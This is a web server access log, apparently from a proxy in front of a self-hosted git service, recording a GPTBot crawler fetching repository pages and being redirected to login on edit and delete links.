"/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" -[17/Feb/2026:15:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" -[17/Feb/2026:15:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 11034] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" -[17/Feb/2026:15:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv" [Client 74.7.227.38] [Length 56061] [Gzip 9.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" -[17/Feb/2026:15:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fmain.py" [Client 74.7.227.38] [Length 36353] [Gzip 7.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" -[17/Feb/2026:15:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:15:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12749] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:15:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 1916] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:15:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" -[17/Feb/2026:15:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" -[17/Feb/2026:15:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile?display=source" [Client 74.7.227.38] [Length 11593] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" -[17/Feb/2026:15:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile?display=source" [Client 74.7.227.38] [Length 11592] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" -[17/Feb/2026:15:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 29] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:15:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 10047] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:15:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 74.7.227.38] [Length 14578] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:15:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" -[17/Feb/2026:15:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15765] [Gzip 4.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" -[17/Feb/2026:15:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15798] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" -[17/Feb/2026:15:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 12782] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" -[17/Feb/2026:15:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11283] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" -[17/Feb/2026:15:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" -[17/Feb/2026:15:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" -[17/Feb/2026:15:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" -[17/Feb/2026:15:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" -[17/Feb/2026:15:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json?display=source" [Client 74.7.227.38] [Length 11060] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" -[17/Feb/2026:15:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html" [Client 74.7.227.38] [Length 11545] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets" [Client 74.7.227.38] [Length 11038] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/types.ts" [Client 74.7.227.38] [Length 11706] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 12136] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 11672] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services" [Client 74.7.227.38] [Length 10143] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html" -[17/Feb/2026:15:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components" [Client 74.7.227.38] [Length 10788] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html" -[17/Feb/2026:15:10:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html" -[17/Feb/2026:15:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/package.json" [Client 74.7.227.38] [Length 11913] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 12072] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js" [Client 74.7.227.38] [Length 10261] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" -[17/Feb/2026:15:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images" [Client 74.7.227.38] [Length 11578] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" -[17/Feb/2026:15:10:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" -[17/Feb/2026:15:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/vite.config.ts" -[17/Feb/2026:15:10:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" -[17/Feb/2026:15:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/vite.config.ts" -[17/Feb/2026:15:10:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" -[17/Feb/2026:15:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/services" -[17/Feb/2026:15:10:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" -[17/Feb/2026:15:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/types.ts" -[17/Feb/2026:15:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16665] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:10:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components" -[17/Feb/2026:15:10:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" -[17/Feb/2026:15:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/.gitignore" -[17/Feb/2026:15:10:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" -[17/Feb/2026:15:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/types.ts" -[17/Feb/2026:15:10:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" -[17/Feb/2026:15:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/services" -[17/Feb/2026:15:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js" [Client 74.7.227.38] [Length 11174] [Gzip 4.90] [Sent-to 192.168.0.250] 